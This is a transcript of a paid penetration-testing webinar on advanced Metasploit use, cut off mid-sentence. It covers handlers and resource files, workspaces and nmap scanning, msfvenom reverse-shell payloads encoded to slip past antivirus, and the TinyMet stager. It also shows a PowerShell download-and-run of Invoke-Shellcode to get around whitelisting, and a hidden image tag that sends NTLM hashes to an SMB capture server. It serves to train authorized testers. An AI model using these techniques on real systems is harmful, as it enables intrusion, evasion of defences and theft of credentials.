Good afternoon, everybody. I think everybody's here now, so just can I get a quick message in the chat to make sure everybody can hear me? Yes, Jeff says yes. All right. I'm assuming the others are here as well. So we're going to go ahead and get started. Great. Thanks, David. My name is Nathan Sweaney, and this webinar is a Metasploit Beyond Shell webinar. The plan is to spend about 2 hours kind of diving into Metasploit and going a little beyond the normal examples that you see online. A couple weeks back, we did a 2-hour kind of intro to Metasploit where we explained how to get it up and installed and running, kind of a brief history of the tool, and then showed how you could compromise a machine and go from there. This webinar hopefully will get you a little bit more comfortable, more proficient and effective with the tool on some of the ideas of things you can do with it. Just a few administrative things. This is being recorded and it will be available after we get it converted and uploaded and all that. We do charge $25 for this webinar, so we ask that you not share it with your friends. It is a revenue generator for us, so we would love for you to share the link so that other folks can buy it as well. But hopefully you'll find it useful and understand and appreciate that. If you have any questions during the webinar, please feel free to throw them in the chat box. I'm going to do my best to answer them as we go, but I've got a lot of information to get through. So if something takes too long, or if it's a question we need some more time with, we may have to circle back around to it after we're done. Also, I kind of mentioned before, if you're not familiar with the basics of Metasploit, don't know how to get it installed, never used it before, you might want to go back and check the previous webinar just to kind of get comfortable with working around and getting through stuff. I believe that should be on our YouTube channel. I actually haven't checked to make sure it's uploaded yet, but it should be available on our YouTube channel. Also, I've only got a few slides here. What you're looking at here is 25% of the slides. Everything else, we're just going to be, we've got some VMs and about 9 pages of notes in pretty small font. So I'm going to be running pretty quickly through stuff. Like I said, feel free if I'm running too fast to ask me to slow down or ask what I typed here or there, that kind of thing. But hopefully I'm working with the understanding that with it recorded, you'll be able to go back and look at the recording later if you need some details. So with that, I'm just going to go ahead and get started. If my slide will progress. My name is Nathan Sweaney. I'm a senior security consultant with Secure Ideas. I've started out in the POS industry a long time ago. Actually, prior to that, I was a developer straight out of college, then moved into sysadmin stuff and eventually kind of picked up in security with the credit card. All the different credit card brands started coming out with their own security initiatives, and then PCI developed out of that. So based in Tulsa, Oklahoma, and there's my contact information if you would like to follow up with me. Just a short thing about Secure Ideas. I'm assuming you're all pretty familiar with us, but we're an independent security consulting firm. We're spread around the country. Our base is in Jacksonville, Florida, but we have folks in various parts of the country, and we travel on site as necessary. So we provide a wide range of security consulting, but our focus is penetration testing and offensive vulnerability assessments. So today, we're going to be looking at Metasploit, as I talked about. This is just a really rough course structure. Again, this isn't a formal presentation, so I don't have a lot of slides. I don't have a lot of, table of contents per se. But the first thing we're going to do is we're going to start out with some things that make it easier to get around the Metasploit tool, and hopefully will make your efforts a little bit more efficient. Then we're going to spend quite a bit of time looking at some different ways to compromise boxes. A lot of people don't pull up Metasploit until after they've done a vulnerability scan and they find something in Nessus and it says there's a Metasploit module for it, so they jump over and they run that. I want to show you some different ways to attack a network and to compromise systems without actually doing the vulnerability scan. And then finally, we're going to look at several things you can do after you pop a box to get the most out of it, ways to kind of be more effective. And, the end goal of any penetration test is to provide business risk to the organization, to be able to show them, hey, here, yes, you knew we had these vulnerabilities, but here's what we can do with it. Here's, we actually exploited this and, we found out that maybe it's worse than you thought it was. And so to do that, we need to be as effective and efficient as possible. So with that, we're going to go ahead and get our hands dirty. So I'm going to jump out of here. Maybe. There it goes. Okay, so the first thing we're going to do is I've got a Windows 7 box right here that we're looking at, and a Kali virtual machine. The first thing we're going to do is talk about multi-handler. Multi-handler is it's a pretty simple module, but it's something that we need later on. So in case somebody's not familiar with it, we're going to go ahead and get that started. So I'm going to start up Metasploit by typing MSF console, and it should start up here pretty quickly. The multi-handler is a generic listener that you can set up within Metasploit that basically several different other types of payloads can communicate back with. So once Metasploit starts up, I'm going to type use exploit multi, and if I could type correctly, come on, no, handler, okay. As always, I always type show options just to make sure I know what I'm looking at. I'm going to set the payload to Windows Meterpreter. All right, Meterpreter / reverse TCP. If you're not familiar with Meterpreter, it's basically a kind of a all-in-one Swiss Army knife of payloads. It does a lot of different things. It allows you to run different modules and whatnot. We covered that in the last webinar a little bit. So now notice the show options there. There wasn't a lot, but now when we type in show options, if I can type show options correctly, you will see a little bit more information. Allows us to provide the local host and the port number that it's going to connect back to. So I'm going to set lhost. You know what? I'm going to type ifconfig because I think, all right, 192.168.1.29. Every once in a while my VM changes when I haven't opened it for a little while. So now I can set the lhost to 192.168.1.29. And I'm going to go ahead this time and leave the port at 4444 just for demonstration purposes. I do recommend, and this when I'm in the field, I almost always change the L port to something else, just because every once in a while, I've mentioned before, we had a client one time that was blocking all connections on 4444 because he thought that was the port Metasploit used. And technically, yes, it is. It's the default port, but you can change it to anything else, and he didn't understand that. But partly just for a little bit of obfuscation and just to avoid stuff like that, I always change the port that we listen on to something random. But for efficiency's sake today, we're just going to leave it the way it is. So now we type run, and we have a handler listener. We have a handler listening. So now what I'm going to do, I'm going to jump back over here to my Windows VM, and I'm going to show you something. We're going to talk about it in a little bit more information. This TinyMet.exe is a handler or a payload that I've already set up, and let me just type in the IP address here. And so when that runs, over here to the left, we see Meterpreter session opened, etc. All of that, the only reason I show you that is to explain multi-handler so that you're familiar with that so we can move on. Now, the thing is, as you notice, so I'm going to background this session, this Meterpreter session. Now our handler is no longer running. If we do jobs-L, that'll show you everything that's listening on the Metasploit, not everything that's listening, but it'll show you the jobs that are running within Metasploit. And it says no active jobs, right? If we do run again or exploit, it's running, but we can't do anything. It's tied up. So there's two problems here. One is it ties up our Metasploit instance, and two, once it connects to a Meterpreter session, it dies. Well, the problem here is I may set up a handler, and I may go run an exploit, and it may take a little while for it to come back, depending on what I'm doing, what attack I'm using. So I want two things to happen. One is I want to continue using Metasploit for other things, and two, let's say I attack two different hosts. As soon as the first one connects back to me, this is going to disappear. So I want to be able to do both of them. So what I'm going to do, I hit Control-C just to close it out here. Again, we look at jobs-L, and there's nothing running. So where's this at? Okay, so I'm going to, as part of my options, there are some kind of hidden options that you don't see in here. One of them is called exit on session. So if we type set exit on session, and we set that to false, obviously the default setting is true. What that does is that closes out the listener as soon as something connects, as soon as we get a session. We're going to set that to false, and we're going to run that. Now, when I type run or exploit, see I get an error. It says exploit aborted due to failure. Setting exit on session to false requires running as a job. Okay, perfect. So we want to run that as a job. And again, it says exploit-j. Some people type run-j will work just as well. So we do that again. We hit enter. Now, notice it started the payload handler, but it gave us our prompt back. So if we do jobs-l, you can see job 0 is the multi-handler running. If we do sessions-l, we still have the session from before. I'm going to come over here and kill that. So that dies. Notice we still have the job running, but no session. So now if I run this again, the session pops up. Give it a second to finish there. And if we look at sessions, we have the one session, but our job is still running. So I'm going to demonstrate on this box, but imagine we had a second box. Why is my command prompt not showing up? So we can imagine we had a second box that our attack also compromised. And see, now we have two different sessions. So again, our job is still running, and we have two different sessions running so that we can continue allowing those to come in. You can imagine a scenario where you might plant an attack in some situation where multiple users would end up running it. That would allow multiple systems to connect into your to your Metasploit box and establish sessions, and then you can walk through those sessions as you have time and not be rushed to hurry up and finish one before the next one connects. So hopefully that's pretty straightforward. The next thing I want to show you is, and just to be clear, we're kind of moving here from relatively simple to a little bit more complicated. So hopefully we'll, if you're familiar with some of these things, we'll move on to some things you're not familiar with pretty quickly. So what I'm going to do is I want to set up the multi-handler, but I want to do that quickly. I don't want to have to type. There's a lot of stuff we just had to type to get through to do that. Metasploit allows you to create a what they call a dotRC file that you can run scripts automatically when it starts. So we're going to go ahead and switch to the right. Okay. We're going to kill these sessions here. And then we're going to go ahead and exit Metasploit. And what we want to do is set up an RC file. So I'm going to do, I'm going to switch over here, and I'm going to use Nano. You can make fun of me if you want to in the chat. Feel free. I have thick skin. And I'm going to name my file handler.rc. And in this file, we're going to basically put all of the commands that we just put in Metasploit. So we're going to do use exploit /multi/handler. And it's a little more difficult because you don't have tab complete, so you got to make sure you type everything correctly. And we're going to use set payload windows /interpreter /verse TCP set lhost. And you might notice I'm capitalizing these just out of habit. It's not necessary. It's not case sensitive. RL port is 4444. We're going to do our set exit on session. Again, I capitalized the first letter to make it readable, but that's not it's not necessary. We're going to set that to false, and then we're going to do exploit-j. So now we save that file. And now when we come over here to run Metasploit, we're going to do MSF console. We're going to do -r, telling it we want to start up with a, I don't know what R stands for, resource maybe, a resource file I think is what that is. And then we're going to do /temp/handler. So we're going to start Metasploit with that. And again, we wait for just a second while it connects to the database and gets everything going. I should insert text editor Flameware here. Absolutely, Jeremy. I'm perfectly fine with that. I am a Windows guy up until within the last several years. So I figured one of these days I might learn VI. I don't have hopes of it though. So notice once we started up, it went ahead and it says resource, where the file was coming from, tells us the resource file, and then it runs through each of the commands we put in there. It starts the payload, we set the lhost, and it responds with the lhost being set, and it goes through. And then it says exploit, and we typed exploit-j, exploit running as a background job. It's running. There we go. So now we can come back over here, run our exploit again, and boom, we're connected. Now notice this only works if your IP address is set. So that's kind of a hassle a little bit to figure out, if you were going to use this every time you go on a client site, or every time your Kali box may have a different IP, you'd have to change that file, which is something of a hassle. But if you regularly are starting and restarting Metasploit, that could be very useful to do, especially if your address doesn't change that often. We're going to look at, We're going to look at some other uses for this as we go on as well. Now notice also in this file, like I said, this is just a list of things that we added, that we typed in Metasploit. You can put pretty much anything in there that you would normally type in Metasploit. So we're going to have another example a little bit later on where we add some more stuff after this. But there's no reason you couldn't set up multiple handlers on different ports, doing lots of different things there. So the next thing is that I wanted to look at is the database. The database functionality hasn't been in Metasploit all that long, or at least not in my mindset. I kind of lose track of time, but it wasn't originally in there. And when it first got added, I think I tried it once and it didn't seem to work real well, and I got frustrated and I gave up. And then not too long ago, I went back and somebody was talking about it, and I went back and played with it a little bit. And I thought, man, this is really impressive. When you use Kali, it's already set up. Metasploit is already configured with the database. It uses a Postgre. I don't know how you pronounce it. Postgre SQL. There's another flame war, I guess, for me to jump on. But it's already configured in Kali, and so you just start running with it, and you're good to go. If you install Metasploit yourself, there's a little bit more steps that you have to go through to get it set up. It's not hard. It just takes a little bit more time. But there's several options here. So I'm going to go ahead and close out of this handler. Oh, I didn't mean to do that. Why not? We'll let that run. Sorry about that. So if we type at the prompt, we're going to type help. It'll get down there. There it is. We're going to type help database. And it's going to show us all of the commands that are specific to help. I don't know if you realized that before, but if you type help, you get a lot of stuff. And notice database backend commands. So you type help database, and it shows you just those portions of the commands that are related to that. Very useful. So there's several things here to look at. The first, just to kind of walk through here, there's several of them that list different things, list all credentials, list all hosts. There's the ability to connect and disconnect to a database, export and import a database. I never use any of that. Rebuild the cache, show status if we do db_status. Most of those settings or those commands are for troubleshooting, obviously exporting, importing if you're needing to move from one system to another. But I rarely use most of that. What I do use is all the list things. So if we type in hosts here, it's going to show us a list of the hosts in the host file. Notice it already has one, 192.168.1.3. If we switch over here to our Windows machine, that's our IP address right there, 192.168.1.3. So it already sees that machine. That's kind of cool. If we type in creds, and the reason it sees that is because it's established a session already. So it keeps track of things that have already happened and just dumps it directly into the database. If we type in creds, you can see where it would put stuff. It'll list services, etc. As it finds things, as Metasploit sees things that we're doing, it'll go ahead and dump them in there. We can also add things directly. So let's say we found out about a host. We can go hosts-a, I believe. Yeah. Hold on, I lost the track of where that's at. I'm going to do host-sh. There it is. Okay. I believe it's host. I thought I had this written down, but apparently I don't. If I do host-sh 192.168.1.5, and then I do hosts, There we go. So it'll add that to that. And you can go ahead and add other columns, different stuff. You can add hosts, you can delete hosts. There's a wide range of things. You can actually search hosts as well. So if you do hosts-s and then type in something specific you're looking for, it'll search through the host database. This is really useful if you have you've done a scan, which we'll look at here in a minute. Oh, let's just go ahead and do that. So one of the other settings, when I do help database, one of the other commands is db nmap. This is a fully functional instance of the nmap scanner built into Metasploit. And what's cool is all of the output goes directly into the database itself. So what I'm going to do, I'm going to come over here and I'm going to do db_nmap. We're going to do -n so we don't resolve host names. We're going to do -st to do a port scan. TCP port scan. We're going to do -o because we want to hopefully recognize the operating systems. We're going to do -t4 just to speed it up a little bit. T4 normally works for pretty well for me. I almost never see anything missed. T5 tends to drop stuff, so that's just the timing. It's how fast, how many threads and whatnot it uses. And then I'm going to do 192.168.1. I'm going to go from 1 to 30. On this network. I think that'll cover most things. And we're just going to let that run. So look, it starts nmap 6.47. I don't know what the current version is, but that's pretty recent. And it'll take just a minute here. So I guess maybe in a learning experience here, I should type the command and then explain what each of the switches does while we're waiting. This shouldn't take very long. There's only a few systems on there. Yeah, so we start seeing some of the nmap output popping up, and you can scroll through it. I'm sure you're all familiar with what nmap looks like. But now if we type in hosts, we have a list of all the hosts it found. We have the OS name, the version number, the type, purpose, etc., what it is. So you can actually, when you do the host help, where is that? The search. You can actually search by, let's say you only want to pull up the hosts that are of type server or of type client or something like that. Or maybe only the ones that are Windows or Linux or whatever. You can do different things like that to then be able to filter out which systems you want to look more in depth at. These can also be used to filter directly into other modules. So for instance, there's a Microsoft SQL scanner that looks for default credentials or some other vulnerabilities. You can feed, rather than type in the IP address or the IP range of systems that you want to scan, you can provide it a search from hosts that will look specifically for, or I'm sorry, it will scan only the systems that are specifically listed here already. So that's a fast way of, rather than just scanning an entire network with a bunch of the auxiliary scanners, you can go into the nmap module, run your nmap scan over the network first, and then use that to feed some of the other scanners. So with all that said, this is cool and all. I don't think there shouldn't be any creds listed. Yeah, I found a number of services there that have populated that now as well. So this is neat, but the thing is, this database persists through a restart. So if we restarted Metasploit, I'm not going to do it now just for time's sake, but if we restarted it and then came back in, we would have all this data still here. And that's a problem because we want to be able to keep stuff separate between engagements, right? You don't want to be seeing data from one engagement on the next. Or even if it's just, you know, hey, we scanned this network this week and we want to do it again next week, we don't want to have all that data still there. So Metasploit gives us what they call workspaces. If we type help workspace, and a workspace is basically just sort of like a namespace in programming. It's an area to keep track of all of our stuff. It's all of the data in that database gets assigned to that specific workspace. So you notice the just by itself, workspace will list workspaces. So if we type in workspace, the only workspace listed is default. The name is default. That's obviously what we're using. That's a problem if we want to keep our information separate. So what I want to do is I want to delete the default one. So I'm going to do -d, workspace -d, and then the name of it is default. and it's gone. It says deleted and recreated the default workspace. Now you notice if I go up here and type hosts, there's nothing there. Services, again, nothing there. So for this one, I want to add a new one. I want to create my own workspace just for this webinar. So I'm going to call it workspace-A, and we're going to call it 1508. We're just going to call it webinar because I don't want to get confused here. So now we have, if we list workspace, it'll show us there's the one named default, there's the one named webinar. I can create another one. So you see now we have 3. The one with the star in it is the one currently selected. So what we want to do is go back up here. We want to switch to a workspace. So we're just going to do workspace, webinar. Now we're in that workspace. Again, if we now notice the star switched over to the webinar one. So now all of the data from here on out that we use will go in the webinar workspace, and we can keep it separate from other things. Okay, one other neat feature, and there's with workspaces, you know, we type in the L host, the local host, a lot for a lot of different modules. Well, you can actually set that as a global variable rather than a module specific variable. So instead of typing, see if I show options, if I set L host right here, it's going to set it for that module. But if I do set G, which is set global L host, 192.168.1.29, now that's set for every module that I start. So I don't have to come in here and re-add that every time. If I switch to another module with a different payload, the L host will already be set. So that's very convenient. So that's just kind of some of the stuff getting started, getting up, getting running. What I wanted to do now is move into some different compromising techniques. We're going to look at some tips and tricks focused on actually compromising systems. And these are just things that I found useful over the years in various scenarios. It's not really in any particular order. Just as I thought of stuff that would be cool to add in here, I kind of wrote them out. So the first thing we're going to look at is MSF Venom. And we're going to switch back over here to the command prompt. MSF Venom is not a part of the MSF console. It's not a tool that runs within the Metasploit console. It's a completely separate tool. Up until a few years ago, there was a tool called MSF Payload, which was designed for generating standalone payloads. And there was a tool called MSF Encode, which was designed for encoding payloads into different formats. I don't remember when it was. I think 2011 or 12, 13, somewhere in there, they added MSF Venom. And MSF Venom, I did that wrong. Did I? No, there, it just takes a minute. Okay, so MSF Venom basically combines, you can see here, it's a replacement of MSF Payload and MSF Encode. They announced that those two were deprecated, and everybody continued to use them up until last month, I think. Well, we're in August, so I think it was in June of this year. They actually completely got rid of MSF Payload and MSF Encode. I think if you run it, MSF Payload, let's see what happens. Yeah, it says the command's not there. If you update Metasploit, those commands are completely gone now. So MSF Venom provides all of the same functionality, plus a little bit of extra functionality, some new things. But most importantly, it standardized the formats and the way things are entered and all the different switches and whatnot. So the other thing is MSF Venom is a little bit faster. You don't notice it when you're doing just a really simple payload generation, but if you try to encode with multiple iterations or multiple different types of encoding, you'll start to notice MSF Venom is considerably faster than the previous versions. So anyways, just kind of walk through here some of the different stuff in -H. Notice there's -L. You can list a module type, which could be payloads, encoders, NOPs, all, etc. So if I type in MSF Venom -L and I want to say payloads, it's going to take a second because it's actually pulling this out of the Metasploit list. And what you'll see is this is pretty much all of the payloads that are built into Metasploit. There's a ton of them there. way more than what you'll ever want to read through there. Some other things, we can do the same things with encoders, with payloads. Let's just look at the encoders. So these are all different ways that you can encode a payload. You won't use 90% of them unless you're trying to experiment and try different things or whatnot. I use a couple on a regular basis. This one here, Shikata Ganai, is probably the most popular. It's got the, as far as rank, there's only a couple that are ranked high, or ranked excellent, I'm sorry. The base 64, and then Shikata Ganai. We'll come back to that in a second. So what we're going to do now is we're going to create just a simple executable file. So what I'm going to do is I'm going to type MSF Venom. I'm going to do -p to tell it the payload that I want to use. So I'm going to use Windows/interpreter/ Now notice too, I also don't have tab complete here because I'm obviously not in Metasploit. So there's the that's the payload. And then I'm going to do my lhost 192.168.1.29. Again, the lhost isn't saved in our. It is saved in our workspace, but we're not in the framework right now. Lport equals 4444. -f is for format. We're going to call it an executable format. -o is where we want it to output it to. So we're going to do /temp/payload.exe. With all that said, we hit enter, and it's going to run through here and create a very simple payload executable. Now notice it makes a couple of assumptions. One, we didn't select a platform, so it says, hey, we're choosing Windows based on the payload. That's pretty wise. We also didn't specify an architecture, so it's going to assume x86 because we didn't specify the 64-bit version. And then it says no encoder or bad characters were specified, so it's going to output a raw payload. When you do an encoding, you can actually specify certain characters that you want to escape, so that when it tries to build that payload, it doesn't include certain characters that might have a problem with however you plan on using that. For instance, if you were to output that, instead of an executable file, if you were to output it into, say, raw Python shellcode that you're going to go throw into another Python exploit, then you might want to avoid certain bad characters. Anyway, it gives us the size and then says it was saved there as payload.exe. Straightforward. So now if all right, let's just do another one. I'm going to basically do the same thing, but we're going to add a couple of things. So we're going to add -a x86, just so it doesn't have to assume. Obviously you could change that if you wanted a different architecture. We're going to do --platform and tell it specifically that we're on Windows. And then we're going to do -e for encoder. We're going to do x86 Shikata _ga_nai. Shikata Ganai is a Japanese word. It literally means nothing can be done about it. And the reason for that, it's what we call a polymorphic encoder. Polymorphic simply means every time it runs, it does something different. And the reason it's different is because the switch, the input that it uses, is environmental. And I don't really know what that is. I'm guessing it could maybe use the system time, something about the system makeup. It might use the MAC address, who knows. But every time it runs, it uses different system data so that the way it morphs the payload is unique. And then just to make sure that we're, to add a little bit more complexity and make it harder for antivirus to catch something like this, we're going to do -i for iterations, and we're going to tell it to run 3 times. So what that means is it's going to take our initial payload, it's going to encode it with Shikata Ganai, then it's going to encode it again, and then it's going to encode it a 3rd time, and then it's going to spit it out into our payload.exe. Now it takes a little bit longer because we're doing the 3 encodings, but it shouldn't take too much here. There it goes. So you can see it ran through the 3 different iterations, and now we still have our payload.exe. Now I want to show you something else. This is kind of a freebie, I guess. It doesn't have anything to do with Metasploit, but I use this all the time. You can start up a Python HTTP server, very simple. You just do python-m, and it's simple HTTP server. Now Python is case sensitive, so that capital S, capital HTTP, and capital S, those have to be that way. Once we do that, notice it says serving HTTP on 0000 port 8000. And it's the base is this directory. So if we come over here to our Windows machine, and we're going to go to the 192.168.1.29:8000, we can browse. Oh, Google didn't like that. Hold on. Silly Internet Explorer. And now I can't find the right keystrokes for Windows. Nope, not HTTPS. All right, there we go. Now notice it shows us what's in that directory. And down here, if we look at, you can see still on the Kali box, it actually showed the messages that came through. So this is really useful just for sharing files. I use it for moving files back and forth between VMs. So I'm going to take this payload. I'm going to save it to my desktop. Windows is running a security scan saying, oh, we're not sure you want to do this. And I'm going to say, yes, I really do. Apparently I ran it instead of saved it. I did not mean to do that. Oh, okay, I did both. So, cancel. You notice, I don't know if you saw down here on the bottom, when that ran, it actually connected back in. So now we have session 1 connected in directly from that payload. So that is MSF Venom. There's a lot of other things you can do. I'm not going to go into a lot of detail. That's maybe for a little bit more advanced webinar. There's a lot of different ways to encode things and to export different types of payloads. One thing to remember is when you use this Python HTTP server, just always kill it when you're done. Just Control-C. It throws up some ugly errors, but it kills out cleanly and you're good to go. You don't want to leave that up in one port and forget about it and then try to start it in another, etc. You can also specify the port. I think it's -P. Nope. I'll have to look that up. I don't know. You can look that up if you want. You can there is a command to specify the port, but if you just leave it blank, it defaults to port 8000. So the next thing I want to look at is this little program called TinyMet that I showed you before over here in Windows, TinyMet.exe. So the thing is, creating a new payload every time we need one is kind of a hassle sometimes. It's not that bad. You know, it didn't take that long to type in all those commands and do all that kind of stuff. But then you got to deal with, well, will antivirus catch this or not? And what do we do? So this gentleman named Sharif Eldeeb started a, hold on, let me copy this link over here. He started he wrote, I guess, a little tool called UltimateMet. I'm going to pull his info over here. This is his blog, and he wrote a tool called UltimateMet. It was designed to be the ultimate Meterpreter standalone EXE. And he goes through a lot of different things. Basically, everything that you could imagine, back then it was with MSF payload, everything that you could imagine doing or encoding it, whatnot, was built into this one executable tool. That was kind of neat, but it was really complicated. There was a lot of code, and I kind of got overwhelmed with it because I don't use 90% of that. But then he created another version called TinyMet. And TinyMet is literally a tiny Meterpreter stager. It's just a standalone executable. But what's neat about it is the local host and the port and the connection type, the stager, or the stage, I'm sorry, is not coded directly into the code. You set it at runtime. So over here, if we Control-C, if I just run TinyMet, it's going to show you, I don't know if you, hopefully you can see that, it allows me to set the transport and then the local host and the L port. So the different 4 transports that are available: reverse TCP, reverse HTTP, reverse HTTPS, and bind TCP. I almost always use reverse HTTPS. And the reason is I never know for sure when I connect to a system whether or not I'm going to be transferring sensitive information over it. If I'm going to be typing passwords in the clear, or if I'm going to be pulling data back through the system. So I always want that added level of SSL security. So I almost always use HTTPS. I'm not doing that in this demo, mainly because when you run multiple exploits on one system and you use HTTPS, you start to have problems. I've had interruptions where, I've had 3 or 4 going on the same system connecting back to the same Kali box, and for whatever reason, things start erroring out. So just for efficiency of this demo, I'm not using the HTTPS, but that's what I recommend. So to use this, very simply, we just type in TinyMet. We do -0 for the reverse TCP. We type in the port number, 1-29, and then we do the IP number and then the port number. And when we connect that, over here, you notice session 2 just opened up. So pretty straightforward. So a couple things about this. One, obviously, this is an executable that this guy made, right? How safe can it be? Well, let me explain to you what you do about it. If we click the link here, it takes us to the GitHub page, and he has all the code here available, and there's actually details. I don't remember exactly where that's at. Yeah, he's got detailed directions on how to compile it yourself. So what I did, it was about a year ago, I guess, maybe, I went through and looked through the code and made sure that I was comfortable with what it was doing. And that's partly why I use TinyMet instead of UltimateMet, because the code on this is reasonable. You can look through it pretty quickly. Even if you're not a developer, you can get a pretty good idea what it's doing. With UltimateMet, there's so much code that I got overwhelmed and said I'm not going to do it. And to be honest, I haven't really regretted that since. But anyways, I compiled TinyMet myself, and I just have an executable that I made that I know is good and reliable, and that's what I use. I'd recommend you do the same. So another neat thing about it, about TinyMet, and I can't explain this, is antivirus doesn't pick it up. If you, lots of people have uploaded it to VirusTotal. If you upload it, it comes up saying, hey, this has been analyzed before. Do you want to analyze, do you want to reanalyze it or just look at the results last time? And if you look at it, it comes up saying none of the antiviruses catch it. And I think I had one time where something caught it, but it was more of a heuristic the way I was using it rather than the signature based. So I don't know what's different, because normally if you create a payload and you throw it up there, eventually antivirus will pick it up and develop a signature for it. So anyways, it's very useful for that. So anyways, I've demonstrated that. Again, it's not terribly difficult to create individual standalone payloads every time, but the ability to type in the IP address and the port number when you need it is just, saves you a few minutes of hassle there. A couple of examples of use case where I've used this in the past. So let's say you already have a system, but you have access to the system in some form. Maybe the customer gave you credentials. Maybe you're testing out a workstation. That happens often when we do an internal test. They may provide us with, here's a demo workstation, and here's 2 sets of credentials. Go with it. See what you can do. So one of the first things I want to do is get Meterpreter on it and see what else I can do from there. So this is a great way you can do that. That lets you have access to lots of other Metasploit modules and other things you can do. Another example let's say you have a file upload vulnerability in a website. You can upload a PHP shell and TinyMet. You can use the PHP shell to execute TinyMet, connect back to you, and now you're running. You've got a Meterpreter session running with the privileges of the web server user. So that's a good. I've actually used that several times with Tomcat. You have a Tomcat manager that allows you to upload war files. I'll upload a war shell from Laudanum, and then upload TinyMet and go from there. Connect back to me. So I'm going to move on at this point. The next thing I wanted to show you is a tool called PowerSploit. Again, this isn't directly related to Metasploit. It's not part of Metasploit, but it's got some neat features that build into Metasploit and let you use it together. So here's the scenario. We've got access to a system. We're on it, but they've got application whitelisting, whether it's Bit9 or McAfee's or whatever. So we can't run our own executables, but we still want to get a Meterpreter session. How do we do it? Well, you can go through and you can actually build your own PowerShell payloads and whatnot in MSF Venom, but it's a pain. I never can remember how to do it, and it's always a hassle. So that's where PowerSploit comes in. I'm going to switch over here to. So PowerSploit is a PowerShell post-exploitation framework. It's basically a bunch of different pen test focused tools written within PowerShell. You can just kind of scroll through there and look. You see there's antivirus bypass stuff, there's code execution, there's some exfiltration, different mayhem, and actually I think he gives a little bit more detail if you scroll down and look at them. There's some reconnaissance stuff and then script modification, several different tools that are built into PowerShell. What we're going to look at, what I really want to show you, because I've used this several times, is, where's it at? I didn't find it. Invoke shellcode, right here, code execution. So invoke shellcode, inject shellcode into a process of ID of your choosing within PowerShell locally. So switch back over here. The first thing we need to do is download it. So we're just gonna do it right here. I'm gonna copy and paste. We're gonna clone it from Git, and this just takes a second here to download the files, and then we're gonna now we've got the PowerSploit directly, so we're gonna CD into it, and then from here I'm going to hold on. My notes aren't correct. I lost half of my stuff. There it is. Okay, so I'm going to do my Python -m simple HTTP server, and now we're going to jump back over to Windows. We're going to hit refresh because we're in a different directory now, and then where I want to go is code execution. Okay, so you can see there's the different stuff. Now I'm going to open up PowerShell. And from our PowerShell command, again, I'm going to copy and paste this. I'm going to actually pull the PowerShell command over. Now there's something. I'm just going to show you how this works. So when I run this, what this is going to do is going to create a new object, a web client, and it's going to download this. It's going to download, and my IP address has changed, so that needs to be 29. And it's going to download code execution invoke -shellcode ps1, which is right here. So if I hit enter, it should come up. What did I do wrong? Code execution, invoke shellcode. Okay, so it loaded that. There it just took a minute. I guess it wasn't returning. So now we want to actually, so what it did is it loaded the invoke shellcode command, commandlet into PowerShell, into this. So now I'm going to call that. I'm going to invoke shellcode. I'm going to tell it the payload, Windows interpreter reverse TCP. I'm going to give it the host. I'm going to give it the port. I'm going to do -force. I can't remember what the -force is, but it needs that for it to work correctly. When we run that, we're going to get an error. And what is the error? I don't know why that didn't work. Windows interpreter reverse TCP L host 192.168.1.29 L port 4444. You know what? This might be set up to use. Hold on. Let's try it with. So I'm going to switch over here to my multi-handler. I'm going to set payload Windows interpreter reverse HTTPS. Set L port as 8443. I'm going to run that. Now if I switch back over here, I'm going to tell it to use HTTPS. Set my port for 8443. Okay, this is the error that we should have gotten. This is what I was expecting. So notice the error here in red. Hopefully you can read that. It says something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the internet and execute it. This is obviously something that will terrify you if you were to do this on a customer site. It's not something you want to do. Turns out what it is this guy recognized when he wrote it, hey, people are just downloading and running this and nobody trusts me. And hey, it's on GitHub, so anybody can put anything up there. So the idea is to go actually look at the code. I'm not gonna do it here because we don't have enough time. But if you walk through it, you'll see that he's basically commented out most of the code and just he spits out this error when you try to run it. But instead, what he's done is he's added invoke -- shellcode to simplify it. So all we have to do, and I've looked at this so that I know it's okay, but I recommend what you do is you download it all, and the stuff that you want to use, walk through the code and make sure you're comfortable with what it's doing, and then keep that copy to use for your engagements. So when we go back up to set up our web client, I'm just going to add here at the end of the line, I'm going to put a second dash in there. And again, our prompt comes back, so it added the commandlet again. It should have replaced our previous one. Now when I run it, we get a session. So we can connect to it, and if we do sessions-l, see session 3, basically you can't tell any difference from the previous sessions except for it connected on 8443. This is really useful in a number of different scenarios. I've had at least 2 different cases where we got into like a Citrix type environment or terminal services where we had access to a system and we could run stuff from the command line, but we couldn't do anything else from it. They had whitelisting going, and we were really struggling to go from there because we couldn't get any other tools on the system. Using PowerSploit, you upload that, you run it, it connects back to you. Now you've got an interpreter running in memory, and you can do the port scanning that we showed earlier. You can do pretty much anything else you want to do. It's pretty powerful. So, but again, the caution is always there. Make sure before you download something from the internet and just run it, make sure that you know what it does. All right, so the next thing I wanted to show you is called, it's an auxiliary module, switch back over here, called SMB capture. How this works, so we're going to do use auxiliary server. And if we look at the different servers, there's a lot of them available. There's a lot of these types of modules, but this is just one example. So we're going to do capture, and we're going to do SMB. Again, I'm going to show options to see what's there. I don't know if I can make that a little bigger. Okay, so some of the options here, you can, so let me explain what this is going to do. Basically, we're going to set up an SMB server, and we're going to try to get people to connect into it. And when they do, they're going to share their credentials with us. Now, we're only going to get the hashes because we don't have, the Windows networking doesn't share the actual clear text username and password, but we're going to get the hashes that then we can go do something else with. So we can output those into either a Kane format or a John format, or both. For this, I'm just going to set up a John format. So I'm going to do set John PW file, and I'm going to put it in /temp. I'll call it johnpasses.txt. It'll actually add some more stuff. I think what it does is it recognizes the format of the passwords, of the hashes, and it puts them in a separate file, but this will work for now. And then our server host is the IP we want to listen on. Actually, you know what? It's set to 0000 for default, so I think that will work. So if we just look at show options, that should work. So now we're going to run that. And the module started. So if we look at jobs-l, you can see now we have the 2 different multi-handlers that we had running and the auxiliary. Now we're going to switch back over to our Windows box. And we're going to create a web page. You can imagine there's a lot of different ways to get somebody to execute code, but this is a simple method. I'm going to call it SMB capture demo. And I'm going to add in img source equals 192.168.1.29 share file.gif. I'm going to do, it doesn't matter for this demo, but if we do height equals 0 and width equals 0, it won't show up. Oh, and I'm going to close my body. close my HTML. And I'm going to save this on my desktop if it comes up. And we're just going to call it page.html. So here it is. So there's a number of ways that we could try to inject something that into somebody's code. You can imagine a lot of different scenarios, but for now, we're just going to come over here and we're going to open that page. And when we do, boom, hopefully you saw that over here, all of these hashes just started pouring in. That has something to do with the way Internet Explorer loads that. Notice over here, the only thing we saw is SMB capture demo. And over here, we got NTLM v2 response captured from. We got user secure ideas and the domain name. LM hashes are disabled. LM client challenge is 